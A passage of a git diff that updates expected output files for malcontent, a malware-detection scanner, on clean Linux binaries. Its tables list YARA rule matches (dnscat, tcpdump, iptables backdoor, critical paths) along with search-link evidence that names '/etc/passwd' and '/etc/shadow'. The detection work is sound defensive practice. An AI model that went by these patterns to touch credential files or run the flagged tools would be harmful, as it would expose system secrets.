[./fetch](https://github.com/search?q=.%2Ffetch&type=code)
[./file](https://github.com/search?q=.%2Ffile&type=code)
[./font](https://github.com/search?q=.%2Ffont&type=code)
[./footer.js](https://github.com/search?q=.%2Ffooter.js&type=code)
[./footnote-reference.js](https://github.com/search?q=.%2Ffootnote-reference.js&type=code)
[./footnote.js](https://github.com/search?q=.%2Ffootnote.js&type=code)
[./formats.js](https://github.com/search?q=.%2Fformats.js&type=code)
[./formatter.js](https://github.com/search?q=.%2Fformatter.js&type=code)
[./freetext.js](https://github.com/search?q=.%2Ffreetext.js&type=code)
[./gcs-regions](https://github.com/search?q=.%2Fgcs-regions&type=code)
[./get-url](https://github.com/search?q=.%2Fget-url&type=code)
[./globals](https://github.com/search?q=.%2Fglobals&type=code)
[./greatest.js](https://github.com/search?q=.%2Fgreatest.js&type=code)
[./handlers/index.js](https://github.com/search?q=.%2Fhandlers%2Findex.js&type=code)
[./hash](https://github.com/search?q=.%2Fhash&type=code)
[./heading.js](https://github.com/search?q=.%2Fheading.js&type=code)
[./heartbeat](https://github.com/search?q=.%2Fheartbeat&type=code)
[./highlight.js](https://github.com/search?q=.%2Fhighlight.js&type=code)
[./history](https://github.com/search?q=.%2Fhistory&type=code)
[./hooks](https://github.com/search?q=.%2Fhooks&type=code)
[./hour.js](https://github.com/search?q=.%2Fhour.js&type=code)
[./html.js](https://github.com/search?q=.%2Fhtml.js&type=code)
[./identity.js](https://github.com/search?q=.%2Fidentity.js&type=code)
[./image-reference.js](https://github.com/search?q=.%2Fimage-reference.js&type=code)
[./image.js](https://github.com/search?q=.%2Fimage.js&type=code)
[./images/background.svg](https://github.com/search?q=.%2Fimages%2Fbackground.svg&type=code)
[./impl/conversions.js](https://github.com/search?q=.%2Fimpl%2Fconversions.js&type=code)
[./impl/diff.js](https://github.com/search?q=.%2Fimpl%2Fdiff.js&type=code)
[./impl/formats.js](https://github.com/search?q=.%2Fimpl%2Fformats.js&type=code)
[./impl/formatter.js](https://github.com/search?q=.%2Fimpl%2Fformatter.js&type=code)
[./impl/invalid.js](https://github.com/search?q=.%2Fimpl%2Finvalid.js&type=code)
[./impl/locale.js](https://github.com/search?q=.%2Fimpl%2Flocale.js&type=code)
[./impl/util.js](https://github.com/search?q=.%2Fimpl%2Futil.js&type=code)
[./implementation](https://github.com/search?q=.%2Fimplementation&type=code)
[./index.css](https://github.com/search?q=.%2Findex.css&type=code)
[./index.html](https://github.com/search?q=.%2Findex.html&type=code)
[./index.js](https://github.com/search?q=.%2Findex.js&type=code)
[./info.js](https://github.com/search?q=.%2Finfo.js&type=code)
[./init.js](https://github.com/search?q=.%2Finit.js&type=code)
[./initialize/content.js](https://github.com/search?q=.%2Finitialize%2Fcontent.js&type=code)
[./initialize/document.js](https://github.com/search?q=.%2Finitialize%2Fdocument.js&type=code)
[./initialize/flow.js](https://github.com/search?q=.%2Finitialize%2Fflow.js&type=code)
[./initialize/text.js](https://github.com/search?q=.%2Finitialize%2Ftext.js&type=code)
[./ink.js](https://github.com/search?q=.%2Fink.js&type=code)
[./inline-code.js](https://github.com/search?q=.%2Finline-code.js&type=code)
[./inspect-input.txt](https://github.com/search?q=.%2Finspect-input.txt&type=code)
[./interfaces](https://github.com/search?q=.%2Finterfaces&type=code)
[./internal](https://github.com/search?q=.%2Finternal&type=code)
[./interval.js](https://github.com/search?q=.%2Finterval.js&type=code)
[./invalid.js](https://github.com/search?q=.%2Finvalid.js&type=code)
[./kbar-actions](https://github.com/search?q=.%2Fkbar-actions&type=code)
[./keys](https://github.com/search?q=.%2Fkeys&type=code)
[./label-end.js](https://github.com/search?q=.%2Flabel-end.js&type=code)
[./lib/aria.js](https://github.com/search?q=.%2Flib%2Faria.js&type=code)
[./lib/constants](https://github.com/search?q=.%2Flib%2Fconstants&type=code)
[./lib/find.js](https://github.com/search?q=.%2Flib%2Ffind.js&type=code)
[./lib/hast-to-react.js](https://github.com/search?q=.%2Flib%2Fhast-to-react.js&type=code)
[./lib/html.js](https://github.com/search?q=.%2Flib%2Fhtml.js&type=code)
[./lib/normalize.js](https://github.com/search?q=.%2Flib%2Fnormalize.js&type=code)
[./lib/svg.js](https://github.com/search?q=.%2Flib%2Fsvg.js&type=code)
[./lib/types](https://github.com/search?q=.%2Flib%2Ftypes&type=code)
[./lib/unicode-punctuation-regex.js](https://github.com/search?q=.%2Flib%2Funicode-punctuation-regex.js&type=code)
[./lib/use-event-source](https://github.com/search?q=.%2Flib%2Fuse-event-source&type=code)
[./lib/use-socket-io](https://github.com/search?q=.%2Flib%2Fuse-socket-io&type=code)
[./lib/use-websocket](https://github.com/search?q=.%2Flib%2Fuse-websocket&type=code)
[./lib/util/info.js](https://github.com/search?q=.%2Flib%2Futil%2Finfo.js&type=code)
[./lib/util/merge.js](https://github.com/search?q=.%2Flib%2Futil%2Fmerge.js&type=code)
[./lib/util/schema.js](https://github.com/search?q=.%2Flib%2Futil%2Fschema.js&type=code)
[./lib/xlink.js](https://github.com/search?q=.%2Flib%2Fxlink.js&type=code)
[./lib/xml.js](https://github.com/search?q=.%2Flib%2Fxml.js&type=code)
[./lib/xmlns.js](https://github.com/search?q=.%2Flib%2Fxmlns.js&type=code)
[./line.js](https://github.com/search?q=.%2Fline.js&type=code)
[./linear.js](https://github.com/search?q=.%2Flinear.js&type=code)
[./link-reference.js](https://github.com/search?q=.%2Flink-reference.js&type=code)
[./link.js](https://github.com/search?q=.%2Flink.js&type=code)
[./list-item.js](https://github.com/search?q=.%2Flist-item.js&type=code)
[./list.js](https://github.com/search?q=.%2Flist.js&type=code)
[./locale.js](https://github.com/search?q=.%2Flocale.js&type=code)
[./log.js](https://github.com/search?q=.%2Flog.js&type=code)
[./login.types](https://github.com/search?q=.%2Flogin.types&type=code)
[./login.utils](https://github.com/search?q=.%2Flogin.utils&type=code)
[./manage-subscribers](https://github.com/search?q=.%2Fmanage-subscribers&type=code)
[./manifest.json](https://github.com/search?q=.%2Fmanifest.json&type=code)
[./map](https://github.com/search?q=.%2Fmap&type=code)
[./matchers](https://github.com/search?q=.%2Fmatchers&type=code)
[./math.js](https://github.com/search?q=.%2Fmath.js&type=code)
[./max.js](https://github.com/search?q=.%2Fmax.js&type=code)
[./memoize](https://github.com/search?q=.%2Fmemoize&type=code)
[./metadata.js](https://github.com/search?q=.%2Fmetadata.js&type=code)
[./millisecond.js](https://github.com/search?q=.%2Fmillisecond.js&type=code)
[./min.js](https://github.com/search?q=.%2Fmin.js&type=code)
[./minio.license](https://github.com/search?q=.%2Fminio.license&type=code)
[./minpath.js](https://github.com/search?q=.%2Fminpath.js&type=code)
[./minproc.js](https://github.com/search?q=.%2Fminproc.js&type=code)
[./minurl.js](https://github.com/search?q=.%2Fminurl.js&type=code)
[./minurl.shared.js](https://github.com/search?q=.%2Fminurl.shared.js&type=code)
[./minute.js](https://github.com/search?q=.%2Fminute.js&type=code)
[./month.js](https://github.com/search?q=.%2Fmonth.js&type=code)
[./nanoid](https://github.com/search?q=.%2Fnanoid&type=code)
[./network.js](https://github.com/search?q=.%2Fnetwork.js&type=code)
[./nice.js](https://github.com/search?q=.%2Fnice.js&type=code)
[./node](https://github.com/search?q=.%2Fnode&type=code)
[./none.js](https://github.com/search?q=.%2Fnone.js&type=code)
[./noop.js](https://github.com/search?q=.%2Fnoop.js&type=code)
[./normalize.js](https://github.com/search?q=.%2Fnormalize.js&type=code)
[./now](https://github.com/search?q=.%2Fnow&type=code)
[./number.js](https://github.com/search?q=.%2Fnumber.js&type=code)
[./object.js](https://github.com/search?q=.%2Fobject.js&type=code)
[./offset/none.js](https://github.com/search?q=.%2Foffset%2Fnone.js&type=code)
[./optional](https://github.com/search?q=.%2Foptional&type=code)
[./order/none.js](https://github.com/search?q=.%2Forder%2Fnone.js&type=code)
[./ordinal.js](https://github.com/search?q=.%2Fordinal.js&type=code)
[./outliner.js](https://github.com/search?q=.%2Foutliner.js&type=code)
[./paragraph.js](https://github.com/search?q=.%2Fparagraph.js&type=code)
[./parse](https://github.com/search?q=.%2Fparse&type=code)
[./path.js](https://github.com/search?q=.%2Fpath.js&type=code)
[./pattern](https://github.com/search?q=.%2Fpattern&type=code)
[./pdf.js/src/display/annotation](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fannotation&type=code)
[./pdf.js/src/display/api.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fapi.js&type=code)
[./pdf.js/src/display/base](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fbase&type=code)
[./pdf.js/src/display/canvas.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fcanvas.js&type=code)
[./pdf.js/src/display/content](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fcontent&type=code)
[./pdf.js/src/display/display](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fdisplay&type=code)
[./pdf.js/src/display/draw](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fdraw&type=code)
[./pdf.js/src/display/editor/alt](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Falt&type=code)
[./pdf.js/src/display/editor/color](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Fcolor&type=code)
[./pdf.js/src/display/editor/freetext](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Ffreetext&type=code)
[./pdf.js/src/display/editor/ink.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Fink.js&type=code)
[./pdf.js/src/display/editor/outliner](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Foutliner&type=code)
[./pdf.js/src/display/editor/stamp.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Fstamp.js&type=code)
[./pdf.js/src/display/editor/tools.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Ftools.js&type=code)
[./pdf.js/src/display/fetch](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ffetch&type=code)
[./pdf.js/src/display/font](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ffont&type=code)
[./pdf.js/src/display/metadata.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fmetadata.js&type=code)
[./pdf.js/src/display/network.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fnetwork.js&type=code)
[./pdf.js/src/display/node](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fnode&type=code)
[./pdf.js/src/display/optional](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Foptional&type=code)
[./pdf.js/src/display/pattern](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fpattern&type=code)
[./pdf.js/src/display/text](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ftext&type=code)
[./pdf.js/src/display/transport](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ftransport&type=code)
[./pdf.js/src/display/worker](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fworker&type=code)
[./pdf.js/src/display/xfa](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fxfa&type=code)
[./pdf.js/src/shared/image](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Fimage&type=code)
[./pdf.js/src/shared/message](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Fmessage&type=code)
[./pdf.js/src/shared/scripting](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Fscripting&type=code)
[./pdf.js/src/shared/util.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Futil.js&type=code)
[./pdf.js/webpack/bootstrap](https://github.com/search?q=.%2Fpdf.js%2Fwebpack%2Fbootstrap&type=code)
[./pdf.worker.js](https://github.com/search?q=.%2Fpdf.worker.js&type=code)
[./pdf.worker.mjs](https://github.com/search?q=.%2Fpdf.worker.mjs&type=code)
[./permissions](https://github.com/search?q=.%2Fpermissions&type=code)
[./permute.js](https://github.com/search?q=.%2Fpermute.js&type=code)
[./placeholderimage.png](https://github.com/search?q=.%2Fplaceholderimage.png&type=code)
[./plugins/all](https://github.com/search?q=.%2Fplugins%2Fall&type=code)
[./plugins/mapset](https://github.com/search?q=.%2Fplugins%2Fmapset&type=code)
[./plugins/patches](https://github.com/search?q=.%2Fplugins%2Fpatches&type=code)
[./point.js](https://github.com/search?q=.%2Fpoint.js&type=code)
[./polar/types](https://github.com/search?q=.%2Fpolar%2Ftypes&type=code)
[./pow.js](https://github.com/search?q=.%2Fpow.js&type=code)
[./property](https://github.com/search?q=.%2Fproperty&type=code)
[./proxy](https://github.com/search?q=.%2Fproxy&type=code)
[./quickselect.js](https://github.com/search?q=.%2Fquickselect.js&type=code)
[./range](https://github.com/search?q=.%2Frange&type=code)
[./ref](https://github.com/search?q=.%2Fref&type=code)
[./rehype-filter.js](https://github.com/search?q=.%2Frehype-filter.js&type=code)
[./replication.yaml](https://github.com/search?q=.%2Freplication.yaml&type=code)
[./request-base](https://github.com/search?q=.%2Frequest-base&type=code)
[./response-base](https://github.com/search?q=.%2Fresponse-base&type=code)
[./revert.js](https://github.com/search?q=.%2Frevert.js&type=code)
[./rgb.js](https://github.com/search?q=.%2Frgb.js&type=code)
[./root.js](https://github.com/search?q=.%2Froot.js&type=code)
[./safari-pinned-tab.svg](https://github.com/search?q=.%2Fsafari-pinned-tab.svg&type=code)
[./schema.js](https://github.com/search?q=.%2Fschema.js&type=code)
[./scripting](https://github.com/search?q=.%2Fscripting&type=code)
[./scripts/pdf.worker.min.mjs](https://github.com/search?q=.%2Fscripts%2Fpdf.worker.min.mjs&type=code)
[./second.js](https://github.com/search?q=.%2Fsecond.js&type=code)
[./sequential.js](https://github.com/search?q=.%2Fsequential.js&type=code)
[./settings.js](https://github.com/search?q=.%2Fsettings.js&type=code)
[./shams](https://github.com/search?q=.%2Fshams&type=code)
[./shared/image](https://github.com/search?q=.%2Fshared%2Fimage&type=code)
[./shared/message](https://github.com/search?q=.%2Fshared%2Fmessage&type=code)
[./shared/scripting](https://github.com/search?q=.%2Fshared%2Fscripting&type=code)
[./shared/util.js](https://github.com/search?q=.%2Fshared%2Futil.js&type=code)
[./shared/utils.js](https://github.com/search?q=.%2Fshared%2Futils.js&type=code)
[./sheet](https://github.com/search?q=.%2Fsheet&type=code)
[./socket-io](https://github.com/search?q=.%2Fsocket-io&type=code)
[./sort.js](https://github.com/search?q=.%2Fsort.js&type=code)
[./src/common/api](https://github.com/search?q=.%2Fsrc%2Fcommon%2Fapi&type=code)
[./src/display/editor/tools.js](https://github.com/search?q=.%2Fsrc%2Fdisplay%2Feditor%2Ftools.js&type=code)
[./src/keybindings](https://github.com/search?q=.%2Fsrc%2Fkeybindings&type=code)
[./src/store](https://github.com/search?q=.%2Fsrc%2Fstore&type=code)
[./stamp.js](https://github.com/search?q=.%2Fstamp.js&type=code)
[./state.js](https://github.com/search?q=.%2Fstate.js&type=code)
[./store](https://github.com/search?q=.%2Fstore&type=code)
[./string.js](https://github.com/search?q=.%2Fstring.js&type=code)
[./stringify](https://github.com/search?q=.%2Fstringify&type=code)
[./strong.js](https://github.com/search?q=.%2Fstrong.js&type=code)
[./styles/root-styles.css](https://github.com/search?q=.%2Fstyles%2Froot-styles.css&type=code)
[./symbol/asterisk.js](https://github.com/search?q=.%2Fsymbol%2Fasterisk.js&type=code)
[./symbol/circle.js](https://github.com/search?q=.%2Fsymbol%2Fcircle.js&type=code)
[./symbol/cross.js](https://github.com/search?q=.%2Fsymbol%2Fcross.js&type=code)
[./symbol/diamond.js](https://github.com/search?q=.%2Fsymbol%2Fdiamond.js&type=code)
[./symbol/plus.js](https://github.com/search?q=.%2Fsymbol%2Fplus.js&type=code)
[./symbol/square.js](https://github.com/search?q=.%2Fsymbol%2Fsquare.js&type=code)
[./symbol/star.js](https://github.com/search?q=.%2Fsymbol%2Fstar.js&type=code)
[./symbol/times.js](https://github.com/search?q=.%2Fsymbol%2Ftimes.js&type=code)
[./symbol/triangle.js](https://github.com/search?q=.%2Fsymbol%2Ftriangle.js&type=code)
[./symbol/wye.js](https://github.com/search?q=.%2Fsymbol%2Fwye.js&type=code)
[./symlog.js](https://github.com/search?q=.%2Fsymlog.js&type=code)
[./syntax](https://github.com/search?q=.%2Fsyntax&type=code)
[./sys/fs/cgroup/memory/memory.limit](https://github.com/search?q=.%2Fsys%2Ffs%2Fcgroup%2Fmemory%2Fmemory.limit&type=code)
[./sys/kernel/mm/transparent](https://github.com/search?q=.%2Fsys%2Fkernel%2Fmm%2Ftransparent&type=code)
[./table-cell.js](https://github.com/search?q=.%2Ftable-cell.js&type=code)
[./table-row.js](https://github.com/search?q=.%2Ftable-row.js&type=code)
[./table.js](https://github.com/search?q=.%2Ftable.js&type=code)
[./task](https://github.com/search?q=.%2Ftask&type=code)
[./text.js](https://github.com/search?q=.%2Ftext.js&type=code)
[./thematic-break.js](https://github.com/search?q=.%2Fthematic-break.js&type=code)
[./this.program](https://github.com/search?q=.%2Fthis.program&type=code)
[./time.js](https://github.com/search?q=.%2Ftime.js&type=code)
[./timer](https://github.com/search?q=.%2Ftimer&type=code)
[./tinykeys](https://github.com/search?q=.%2Ftinykeys&type=code)
[./toolbar.js](https://github.com/search?q=.%2Ftoolbar.js&type=code)
[./tools.js](https://github.com/search?q=.%2Ftools.js&type=code)
[./trace.log](https://github.com/search?q=.%2Ftrace.log&type=code)
[./transport](https://github.com/search?q=.%2Ftransport&type=code)
[./typeof.js](https://github.com/search?q=.%2Ftypeof.js&type=code)
[./types.js](https://github.com/search?q=.%2Ftypes.js&type=code)
[./uri-transformer.js](https://github.com/search?q=.%2Furi-transformer.js&type=code)
[./use-websocket](https://github.com/search?q=.%2Fuse-websocket&type=code)
[./util.inspect](https://github.com/search?q=.%2Futil.inspect&type=code)
[./util.js](https://github.com/search?q=.%2Futil.js&type=code)
[./util/arithmetic](https://github.com/search?q=.%2Futil%2Farithmetic&type=code)
[./util/case-insensitive-transform.js](https://github.com/search?q=.%2Futil%2Fcase-insensitive-transform.js&type=code)
[./util/case-sensitive-transform.js](https://github.com/search?q=.%2Futil%2Fcase-sensitive-transform.js&type=code)
[./util/create.js](https://github.com/search?q=.%2Futil%2Fcreate.js&type=code)
[./util/defined-info.js](https://github.com/search?q=.%2Futil%2Fdefined-info.js&type=code)
[./util/info.js](https://github.com/search?q=.%2Futil%2Finfo.js&type=code)
[./util/schema.js](https://github.com/search?q=.%2Futil%2Fschema.js&type=code)
[./util/tooltip/translate](https://github.com/search?q=.%2Futil%2Ftooltip%2Ftranslate&type=code)
[./util/types.js](https://github.com/search?q=.%2Futil%2Ftypes.js&type=code)
[./util/utils](https://github.com/search?q=.%2Futil%2Futils&type=code)
[./utils/batch](https://github.com/search?q=.%2Futils%2Fbatch&type=code)
[./utils/dimensions](https://github.com/search?q=.%2Futils%2Fdimensions&type=code)
[./utils/empties](https://github.com/search?q=.%2Futils%2Fempties&type=code)
[./utils/errors](https://github.com/search?q=.%2Futils%2Ferrors&type=code)
[./utils/escape](https://github.com/search?q=.%2Futils%2Fescape&type=code)
[./utils/flatten](https://github.com/search?q=.%2Futils%2Fflatten&type=code)
[./utils/hash](https://github.com/search?q=.%2Futils%2Fhash&type=code)
[./utils/index](https://github.com/search?q=.%2Futils%2Findex&type=code)
[./utils/interleave](https://github.com/search?q=.%2Futils%2Finterleave&type=code)
[./utils/nonce](https://github.com/search?q=.%2Futils%2Fnonce&type=code)
[./utils/reflow](https://github.com/search?q=.%2Futils%2Freflow&type=code)
[./utils/stylis](https://github.com/search?q=.%2Futils%2Fstylis&type=code)
[./utils/warning](https://github.com/search?q=.%2Futils%2Fwarning&type=code)
[./valid-routes](https://github.com/search?q=.%2Fvalid-routes&type=code)
[./value.js](https://github.com/search?q=.%2Fvalue.js&type=code)
[./web/interfaces](https://github.com/search?q=.%2Fweb%2Finterfaces&type=code)
[./web/text](https://github.com/search?q=.%2Fweb%2Ftext&type=code)
[./webpack/bootstrap](https://github.com/search?q=.%2Fwebpack%2Fbootstrap&type=code)
[./webpack/runtime/compat get default](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fcompat+get+default&type=code)
[./webpack/runtime/ensure chunk](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fensure+chunk&type=code)
[./webpack/runtime/get mini-css chunk](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fget+mini-css+chunk&type=code)
[./webpack/runtime/global](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fglobal&type=code)
[./webpack/runtime/load script](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fload+script&type=code)
[./webpack/runtime/nonce](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fnonce&type=code)
[./week.js](https://github.com/search?q=.%2Fweek.js&type=code)
[./worker](https://github.com/search?q=.%2Fworker&type=code)
[./xfa](https://github.com/search?q=.%2Fxfa&type=code)
[./year.js](https://github.com/search?q=.%2Fyear.js&type=code)
[./zone.js](https://github.com/search?q=.%2Fzone.js&type=code)
[chmod u+rxw](https://github.com/search?q=chmod+u%2Brxw&type=code)
[curl ShareErr: WriteUnsetTitle](https://github.com/search?q=curl+ShareErr%3A+WriteUnsetTitle&type=code)
[curl command for prefixes.could not parse](https://github.com/search?q=curl+command+for+prefixes.could+not+parse&type=code)
[curl command for upload](https://github.com/search?q=curl+command+for+upload&type=code)
[curl command to allow upload access for a single object. Command expires in 7 days](https://github.com/search?q=curl+command+to+allow+upload+access+for+a+single+object.+Command+expires+in+7+days&type=code)
[curl command to allow upload access of only](https://github.com/search?q=curl+command+to+allow+upload+access+of+only&type=code)
[curl command to allow upload access to a folder. Command expires in 120 hours.](https://github.com/search?q=curl+command+to+allow+upload+access+to+a+folder.+Command+expires+in+120+hours.&type=code)
[curl command to allow upload access to any objects matching the key prefix](https://github.com/search?q=curl+command+to+allow+upload+access+to+any+objects+matching+the+key+prefix&type=code) | | MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"host"](https://github.com/search?q=json%3A%22host%22&type=code)
[json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Ca+href%3E&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | diff --git a/test_data/linux/clean/misp_sample.ndjson.log.simple b/test_data/linux/clean/misp_sample.ndjson.log.simple new file mode 100644 index 00000000..f9874158 --- /dev/null +++ b/test_data/linux/clean/misp_sample.ndjson.log.simple @@ -0,0 +1,12 @@ +# linux/clean/misp_sample.ndjson.log: critical +3P/threat_hunting/pastebin: medium +crypto/aes: low +fd/multiplex: low +ref/ip: medium +ref/site/download: high +ref/site/php: medium +ref/site/url: low +ref/words/backdoor: high +ref/words/decryptor: medium +ref/words/ransomware/lvt: medium +ref/words/rootkit: high diff --git a/test_data/linux/clean/mongosh.simple b/test_data/linux/clean/mongosh.simple index 5740cb6b..3fddc9a7 100644 --- a/test_data/linux/clean/mongosh.simple +++ b/test_data/linux/clean/mongosh.simple @@ -3,7 +3,6 @@ archives/unarchive: medium cloud/aws/metadata: low cloud/google/metadata: low combo/backdoor/kill_rm: medium -combo/critical_paths: medium combo/dropper/shell: medium combo/net/scan_tool: medium combo/net/tunnel_proxy: medium diff --git a/test_data/linux/clean/neuvector-agent.aarch64.md b/test_data/linux/clean/neuvector-agent.aarch64.md index 888cb660..2d4bb16a 100644 --- a/test_data/linux/clean/neuvector-agent.aarch64.md +++ b/test_data/linux/clean/neuvector-agent.aarch64.md @@ -1,143 +1,142 @@ ## linux/clean/neuvector-agent.aarch64 [⚠️ MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [3P/threat_hunting/dnscat](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#dnscat_offensive_tool_keyword) | [references 'dnscat' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [dnscat](https://github.com/search?q=dnscat&type=code) | -| MEDIUM | [3P/threat_hunting/tcpdump](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#tcpdump_greyware_tool_keyword) | [references 'tcpdump' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [tcpdump](https://github.com/search?q=tcpdump&type=code) | -| MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | -| MEDIUM | [combo/backdoor/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/backdoor/iptables.yara#iptables_upload_http) | uploads, uses iptables and HTTP | [HTTP](https://github.com/search?q=HTTP&type=code)
[iptables -](https://github.com/search?q=iptables+-&type=code)
[iptables-savegraceful](https://github.com/search?q=iptables-savegraceful&type=code)
[iptablessent](https://github.com/search?q=iptablessent&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/1/exe/etc/passwd/etc/shadowFMON](https://github.com/search?q=%2Fproc%2F1%2Fexe%2Fetc%2Fpasswd%2Fetc%2FshadowFMON&type=code)
